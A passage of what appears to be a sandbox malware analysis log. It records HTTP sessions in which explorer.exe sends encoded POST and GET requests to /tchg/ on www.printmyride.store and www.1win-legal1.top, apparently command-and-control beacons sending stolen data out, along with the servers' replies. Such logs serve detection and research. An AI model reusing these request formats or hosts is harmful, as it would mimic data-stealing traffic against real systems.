79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>
                                                                                                                    May 30, 2023 11:08:57.291728020 CEST586INData Raw: 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72
                                                                                                                    Data Ascii: ...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http:/
                                                                                                                    May 30, 2023 11:08:57.291740894 CEST588INData Raw: 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <ul> <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <
                                                                                                                    May 30, 2023 11:08:57.291800022 CEST588INData Raw: 65 61 72 63 68 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: earch</a> </div> </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    19192.168.11.2049778130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:02.355159044 CEST590OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 51 41 62 69 4e 71 63 54 34 31 63 6f 39 47 6d 6f 4d 6d 32 43 62 6d 37 73 78 66 6f 78 65 2d 70 68 77 41 5a 6b 54 6f 33 55 38 65 76 6e 6e 35 43 52 50 6d 76 4f 30 62 4e 47 6e 43 46 37 78 34 4e 42 53 5a 4a 50 71 77 6a 59 45 5a 64 4c 76 50 78 4d 52 45 4e 33 4c 42 31 70 46 59 39 54 74 37 66 5a 75 5f 48 46 4d 73 66 37 42 59 67 57 6d 68 75 30 7a 75 75 58 75 5a 46 79 56 71 68 59 71 32 42 64 55 31 4e 36 7e 35 43 59 4e 6b 64 59 5a 4e 34 57 5a 79 6e 61 75 54 58 33 4d 6c 6e 78 45 6e 59 46 70 33 65 58 46 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCQAbiNqcT41co9GmoMm2Cbm7sxfoxe-phwAZkTo3U8evnn5CRPmvO0bNGnCF7x4NBSZJPqwjYEZdLvPxMREN3LB1pFY9Tt7fZu_HFMsf7BYgWmhu0zuuXuZFyVqhYq2BdU1N6~5CYNkdYZN4WZynauTX3MlnxEnYFp3eXFQ).
                                                                                                                    May 30, 2023 11:09:02.366657972 CEST590INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:09:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.11.2049761172.67.153.16380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:07:53.782634020 CEST275OUTGET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.1win-legal1.top
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:07:53.852998018 CEST276INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 30 May 2023 09:07:53 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/7.4.29
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://1win-legal1.top/tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IpzbYQNdyL0lggGTqaP%2Fk14kPhsUrz6Dn4vnR19CKS2sV631bxOZyXwTuJnoSZWjrtKBXngsAljYFlnklV89UcWNx0uJivQcMDn0MXNMwO3eJSDs0HmIluQ9rELS5L7Dxhr%2Fhzcb"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 7cf5d45528e66961-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    20192.168.11.2049779130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:04.890269041 CEST591OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 52 67 72 69 49 4a 45 54 78 31 63 72 79 6d 6d 6f 46 47 32 4f 62 6d 48 73 78 65 73 68 65 4d 64 68 77 69 78 6b 53 70 33 55 39 65 76 6e 73 5a 43 75 51 32 76 5f 30 62 78 34 6e 44 35 37 78 38 64 42 55 71 78 50 39 77 6a 62 63 70 64 49 28 5f 78 50 61 6b 4e 74 4c 42 4a 44 46 5a 5a 54 74 49 62 5a 70 39 28 46 66 4e 66 34 46 34 67 51 67 68 75 31 6d 65 75 6a 75 5a 42 4d 56 6f 77 6a 71 46 64 64 56 56 74 36 28 35 43 58 61 6b 64 66 45 64 35 53 4a 6d 28 56 76 42 28 5a 5a 41 44 76 41 32 5a 64 6a 43 33 53 48 4f 54 5f 32 37 46 30 7e 64 76 4e 6a 36 49 47 31 4d 4d 61 67 31 69 32 68 50 6a 4d 44 62 45 4a 69 59 31 52 4c 72 41 4b 43 39 75 33 47 64 6d 42 6b 6d 42 4b 56 32 38 68 65 6d 58 51 63 53 61 34 4c 39 65 6b 41 76 76 61 74 30 49 56 4b 4a 58 79 77 74 4b 70 51 57 35 4c 50 36 35 46 61 39 4b 4a 71 6e 35 61 4b 76 66 58 58 50 64 79 6c 35 4b 32 73 53 4d 42 31 6a 65 78 66 6c 4d 44 48 39 4c 63 44 46 7a 30 66 38 42 68 54 48 67 57 42 5a 72 64 72 54 44 76 72 50 28 32 4e 61 41 5f 48 66 6b 75 4e 56 4b 61 33 67 4e 64 61 6f 33 59 43 32 68 52 53 6b 36 59 33 51 72 44 75 34 74 57 6d 46 55 47 62 64 45 69 78 36 50 6b 4e 70 50 6f 63 73 30 70 64 56 69 53 58 65 77 47 6e 37 6e 33 36 71 75 52 6c 51 74 6f 54 31 61 74 59 79 37 44 34 2d 7e 77 69 6d 46 74 74 43 36 39 58 4c 4b 66 4f 44 55 4c 67 2d 74 61 53 30 64 4a 65 4b 77 58 79 68 73 4a 28 37 71 55 7a 6f 7e 66 44 6d 32 71 6b 45 6c 5a 36 36 28 62 36 39 66 35 59 37 76 73 79 69 4c 5f 37 47 47 31 56 6e 5a 2d 4e 74 5a 75 34 48 6b 47 41 51 69 4e 71 7a 54 6f 72 55 54 41 61 4b 6f 6b 33 4f 6c 61 64 61 63 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCRgriIJETx1crymmoFG2ObmHsxesheMdhwixkSp3U9evnsZCuQ2v_0bx4nD57x8dBUqxP9wjbcpdI(_xPakNtLBJDFZZTtIbZp9(FfNf4F4gQghu1meujuZBMVowjqFddVVt6(5CXakdfEd5SJm(VvB(ZZADvA2ZdjC3SHOT_27F0~dvNj6IG1MMag1i2hPjMDbEJiY1RLrAKC9u3GdmBkmBKV28hemXQcSa4L9ekAvvat0IVKJXywtKpQW5LP65Fa9KJqn5aKvfXXPdyl5K2sSMB1jexflMDH9LcDFz0f8BhTHgWBZrdrTDvrP(2NaA_HfkuNVKa3gNdao3YC2hRSk6Y3QrDu4tWmFUGbdEix6PkNpPocs0pdViSXewGn7n36quRlQtoT1atYy7D4-~wimFttC69XLKfODULg-taS0dJeKwXyhsJ(7qUzo~fDm2qkElZ66(b69f5Y7vsyiL_7GG1VnZ-NtZu4HkGAQiNqzTorUTAaKok3Oladac.
                                                                                                                    May 30, 2023 11:09:04.901141882 CEST592INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:09:04 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    21192.168.11.2049780130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:07.422894955 CEST605OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 52 67 72 69 49 4a 45 54 78 31 63 72 79 6d 6d 6f 46 47 32 4f 62 6d 48 73 78 65 73 68 65 4d 6c 68 77 52 4a 6b 64 71 66 55 6e 65 76 6e 6c 35 43 56 51 32 76 59 30 66 6c 30 6e 44 31 72 78 2d 56 42 55 38 74 50 39 44 62 62 5a 70 64 4e 36 5f 78 4e 52 45 4e 35 4c 42 31 58 46 64 49 6f 74 34 76 5a 75 36 37 46 64 4f 48 37 4a 49 67 57 67 68 75 78 73 2d 75 42 75 5a 4e 63 56 6f 38 6a 71 48 70 64 56 6e 6c 36 34 75 65 58 41 45 64 63 52 74 35 6e 53 32 7e 72 76 42 37 4e 5a 41 44 56 41 33 64 64 6a 45 33 53 57 35 6e 38 32 62 46 30 67 74 76 4f 6e 36 45 4b 31 4d 68 5a 67 31 6d 32 68 4e 6a 4d 52 4c 45 4a 6d 38 68 51 43 72 41 4d 50 64 76 76 43 64 69 4a 6b 6d 46 30 56 30 77 68 65 32 54 51 63 68 79 34 49 66 32 6b 63 66 76 59 69 55 49 64 66 35 58 55 77 74 36 44 51 58 5a 68 50 36 74 46 62 66 53 4a 28 7a 6c 62 61 66 66 56 59 76 63 79 6f 5a 4f 45 73 53 38 64 31 6a 66 30 66 68 38 44 47 4f 44 63 41 45 7a 7a 63 73 42 6d 62 6e 67 35 4c 35 58 74 72 54 76 52 72 50 32 7a 4e 5a 73 5f 45 5f 6b 75 64 6d 53 5a 35 51 4e 61 57 49 32 48 47 32 68 47 53 6b 33 78 33 53 48 54 76 49 42 57 6e 78 34 47 49 64 45 6a 36 36 50 67 55 35 50 75 4e 38 30 70 64 56 6d 67 58 65 30 47 6d 4b 50 33 72 4b 65 52 75 6e 35 6f 66 56 61 6a 59 79 37 53 34 2d 79 44 69 6e 38 4d 74 42 79 58 58 4a 6d 66 4a 53 45 4c 68 37 52 46 46 45 64 4d 61 4b 77 6d 76 78 77 6b 28 36 47 63 7a 72 57 70 45 57 61 71 6e 45 56 5a 7e 36 28 59 34 64 66 2d 5a 37 76 41 32 69 57 6d 37 47 71 45 56 6e 45 7a 4e 76 5a 75 35 7a 4e 33 62 44 65 69 78 52 58 43 6b 6a 66 6a 56 72 51 49 75 5f 31 6c 45 64 7a 76 34 42 4f 72 6c 56 59 56 77 54 37 4b 4e 2d 39 43 79 45 65 56 53 54 55 61 42 61 41 74 4e 52 72 76 54 5f 63 39 6c 7a 76 4e 51 4b 69 62 33 43 6e 5a 47 33 73 53 63 6c 53 72 33 31 28 77 59 56 7a 6d 38 61 41 62 55 6a 43 55 30 4b 72 49 6c 4b 7a 64 69 4e 49 65 54 4b 38 6b 47 46 39 5f 61 56 4c 57 63 64 6e 33 4d 68 28 6f 7e 45 6d 32 7e 43 44 44 65 4b 71 31 76 2d 6d 58 66 64 52 39 6e 77 31 6c 77 72 57 71 69 6f 7e 36 7a 6b 77 38 6d 74 71 57 62 44 37 43 34 55 6c 37 66 6d 28 38 36 4d 4c 51 75 47 4f 6f 73 6b 6f 64 39 50 31 75 44 4a 49 43 46 30 37 63 79 5f 6d 41 36 78 57 43 50 75 78 74 4b 49 77 38 4e 43 58 63 45 76 28 39 6d 68 56 32 6c 74 78 32 47 44 7e 39 44 76 6b 69 30 46 37 57 62 73 4b 7a 58 64 65 36 47 69 78 44 49 31 62 7a 67 51 4a 46 33 38 7a 6b 54 6b 4a 66 55 2d 71 55 57 30 39 46 28 4a 71 50 5a 43 52 69 6d 51 37 70 39 58 39 4f 77 77 74 52 4c 45 76 31 76 74 28 74 41 69 4c 76 50 33 37 54 43 30 68 62 42 55 70 78 4e 67 72 75 68 42 70 77 74 69 72 74 7a 62 30 36 4b 6c 58 7a 4e 71 53 38 72 7a 6b 41 72 50 74 59 36 31 5a 34 47 58 46 41 4e 49 4a 58 54 71 73 43 5a 6e 55 4b 65 44 45 61 32 6d 4c 68 43 4a 6e 31 67 58 62 30 53 6d 46 5a 63 46 46 5a 36 4e 59 54 46 6e 28 76 41 50 42 6e 34 65 37 76 78 62 32 74 63 62 48 77 6b 51 58 63 49 37 39 46 78 6a 54 62 62 2d 28 6c 6c 63 4c 5a 6b 56 56 59 6b 63 33 43 75 38 61 6a 52 63 4f 33 35 63 53 62 6c 57 58 59 73 43 73 7a 66 4d 4f 65 64 68 58 32 77 75 31 48 39 44 31 78 4b 55 62 69 31 77 6e 66 6e 79 49 79 4a 30 64 75 28 66 79 4f 6d 69 6d 51 46 56 6e 56 50 63 57 61 74 76 36 37 48 37 32 4c 4e 76 57 75 49 44 67 4e 45 64 45 65 77 63 31 48 55 44 7a 70 36 31 57 32 56 37 68 4a 34 2d 4f 49 6e 4f 52 47 73 58 69 47 7e 71 71 39 43 5a 73 63 4c 69 6e 6e 53 78 48 42 41 74 61 33 55 74 63 37 46 4c 66 49 43 6b 39 79 4f 78 58 41 36 30 4b 2d 6e 77 43 56 56 39 78 69 72 70 45 71 56 39 45 66 6e 58 36 59 6e 6f 4b 36 48 33 6e 42 35 44 43 34 44 64 52 79 45 73 46 6d 42 42 78 51 58 6d 53 39 72 52 43 39 6a 71 55 62 62 4e 61 79 79 47 68 4d 33 50 55 63 50 67 75 31 66 43 74 4a 4b 5a 51 4a 74 33 54 53 62 62 38 74 67 47 7a 4c 41 36 62 63 56 48 66 64 47 6f 68 59 5a 53 4d 41 79 74 79 72 46 63 54 44 74 6d 56 57 46 65 36 53 4a 65 46 44 31 4b 61 36 30 66 30 6f 62 5a 37 4e 6f 5f 37 6a 43 58 41 42 44 49 39 53 70 67 74 31 75 79 47 79 7e 38 51 68 51 58 45 4f 46 4e 47 49 52 5a 4c 67 6a 30 49 6c 57 30 4b 48 53 70 70 66 62 5a 68 39 61 45 35 30 4c 62 55 6e 64 5f 51 64 6d 73 73 58 4e 36 48 7a 78 53 4d 6d 75 53 35 59 68 67 65 46 4c 61 6f 58 7e 66 71 73 56 6f 71 42 30 35 74 78 78 6d 51 55 43 72 46 4d 36
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCRgriIJETx1crymmoFG2ObmHsxesheMlhwRJkdqfUnevnl5CVQ2vY0fl0nD1rx-VBU8tP9DbbZpdN6_xNREN5LB1XFdIot4vZu67FdOH7JIgWghuxs-uBuZNcVo8jqHpdVnl64ueXAEdcRt5nS2~rvB7NZADVA3ddjE3SW5n82bF0gtvOn6EK1MhZg1m2hNjMRLEJm8hQCrAMPdvvCdiJkmF0V0whe2TQchy4If2kcfvYiUIdf5XUwt6DQXZhP6tFbfSJ(zlbaffVYvcyoZOEsS8d1jf0fh8DGODcAEzzcsBmbng5L5XtrTvRrP2zNZs_E_kudmSZ5QNaWI2HG2hGSk3x3SHTvIBWnx4GIdEj66PgU5PuN80pdVmgXe0GmKP3rKeRun5ofVajYy7S4-yDin8MtByXXJmfJSELh7RFFEdMaKwmvxwk(6GczrWpEWaqnEVZ~6(Y4df-Z7vA2iWm7GqEVnEzNvZu5zN3bDeixRXCkjfjVrQIu_1lEdzv4BOrlVYVwT7KN-9CyEeVSTUaBaAtNRrvT_c9lzvNQKib3CnZG3sSclSr31(wYVzm8aAbUjCU0KrIlKzdiNIeTK8kGF9_aVLWcdn3Mh(o~Em2~CDDeKq1v-mXfdR9nw1lwrWqio~6zkw8mtqWbD7C4Ul7fm(86MLQuGOoskod9P1uDJICF07cy_mA6xWCPuxtKIw8NCXcEv(9mhV2ltx2GD~9Dvki0F7WbsKzXde6GixDI1bzgQJF38zkTkJfU-qUW09F(JqPZCRimQ7p9X9OwwtRLEv1vt(tAiLvP37TC0hbBUpxNgruhBpwtirtzb06KlXzNqS8rzkArPtY61Z4GXFANIJXTqsCZnUKeDEa2mLhCJn1gXb0SmFZcFFZ6NYTFn(vAPBn4e7vxb2tcbHwkQXcI79FxjTbb-(llcLZkVVYkc3Cu8ajRcO35cSblWXYsCszfMOedhX2wu1H9D1xKUbi1wnfnyIyJ0du(fyOmimQFVnVPcWatv67H72LNvWuIDgNEdEewc1HUDzp61W2V7hJ4-OInORGsXiG~qq9CZscLinnSxHBAta3Utc7FLfICk9yOxXA60K-nwCVV9xirpEqV9EfnX6YnoK6H3nB5DC4DdRyEsFmBBxQXmS9rRC9jqUbbNayyGhM3PUcPgu1fCtJKZQJt3TSbb8tgGzLA6bcVHfdGohYZSMAytyrFcTDtmVWFe6SJeFD1Ka60f0obZ7No_7jCXABDI9Spgt1uyGy~8QhQXEOFNGIRZLgj0IlW0KHSppfbZh9aE50LbUnd_QdmssXN6HzxSMmuS5YhgeFLaoX~fqsVoqB05txxmQUCrFM6yP9L2mIn7wShcFgHXMDnszN9OgDFOAz3Q7VhrVFopLZ~4vQPR1SBWzjXL3rVYtND60bV9FUAwAMkGhD6Z0RK-lAzoxCweXKEONO~ouLAkMlbLXQSFPwIbr1RG8NO9ICZrRRQu(bU3RJgywhWQ8L9HQ1N23xEif9Y24D4ntMsVQ1iYEfwMWNWVgV0diVQW9iF3C9iRfDmd~seNWFP5d0UvWZj_2sDRB7B1kgTGgrTIcfFBk9~_0e4HlnqKvnpP3CZbZBwAgzp4IA9jPkOiWDr-Z188R1uFtPh8Ycaj7lQ6DlCMOrGc6uSQYNOqClEVnIRH4CO0YfCHhc1qhqmy6m4FhjpDsYZ5xdL4BSTGEuGn8V5Sl2pRLSfvoOY0~LCigPYZs14hrLYsQD04aLxZFKnt1H7GapXK93pcFenG0Jf3bHmX8pkjsjrIqW50LqxzSDNRyDFnBS5fD48I0KCG0x1tTrwEc3KGqeClvGs2iuKotnJD23uTdW5nUmkRD1yMX_0lJA8r2CDkvQbCuuBqinYAaiQXZNWFQOvQRR8OTvt5kC8jI8N8TZf80HLNVOGaCX7hfsN8ZxYz9PbkCSAqmlGPCwIJ0NtelkapWt0IIPBevJi5jdZq1FUnDD0GtJ~2YsaJSzOAi7VjlnNGZ2xD2MwnyzzcR0S-jkrEifGpn0H8X_kgqeq7kwX5OktjGO6xiKANcHzLV2827FeD262xnWcD(PGQvMhvT3e6NCFSB4jgaOyCKL23LCDhBrJE5-zNtTVnoZeZ48eHh1Bp80Rn6fIYmR4KKiIvMOGzGPwfSnXHExmyLQa2UyWUsvy5oP3QZHb_~mQ3dQRIs_vxuQx1wg5F2bS3vlZa9KeD6v~mjuxlonZVl3pD9hc3fXzMz-3H~3PGrw1A5RHQA8Rp0ZMB8ymtR5SNFi8OoopTb73IN4fJEBjxrQADky5p0LRbK2TYvNp4B8l27hpvi95AKkDjH9kornQTh3bZOG(fHAGRIT8484luCQRRadq9JYnlXrNxQ9UgbVyp0_EqyMAwrKydzMKHDLBWG0wGoPkZ~GGefu8BwpUXlnjnj9n_gTUgC6PtcXn69nZz5DosGH7OrPE9L7hR310Ph-hxVXq9Gdjw5oj4grizoYMfsuKnYYISjFiEJfJqfuHyAZd-bDcjT3uXuoNc0ZAgo20xxI6B9JPpMc4gkkmZLeS1N8uA8otWgpydF-4noKS-xxSrhOmXsMaYoZvNDpKvuJd6GoBMrQ7iqmhW5Sn4QB1W0lqvfNGOJHIfefgjD5Gl0lmtujQeLlPCM2KRiIDMD_ZMa-7eFrZoiFGaGfoMHWpVMMIk4tf-v4q5x8O1B_I6qi1fsE~pqpr-W212oaqLlTWlHkBvK5Ukx5Q7Iaxls5a9MRh5H6qpZaWtCq0sw33TzjIdyI3g5QXL3S9I6F0i5JIfizOhH-yj2mK1e-oI5r0ZGFEMQKDrXdmiYCWVWBx8HjxbdUoMWiDqfqzhGUms(o2tsJPqJW0uzNtgm2yw(b5ilOk93vjfVHTXcvVCvMd2~hx43zBdyrWD5_dkGBlhwhXIZITGUWAZBerZNPkcevnHMdomuxxmI4c9aPko6SnXMtIbsrzEDk~Ry5j6oaeJpuRsO4rJrHMkcJyOqA(dYPEc0liiwMe0uCUPsTJtO0HMV9AN9vROz-X4EcZ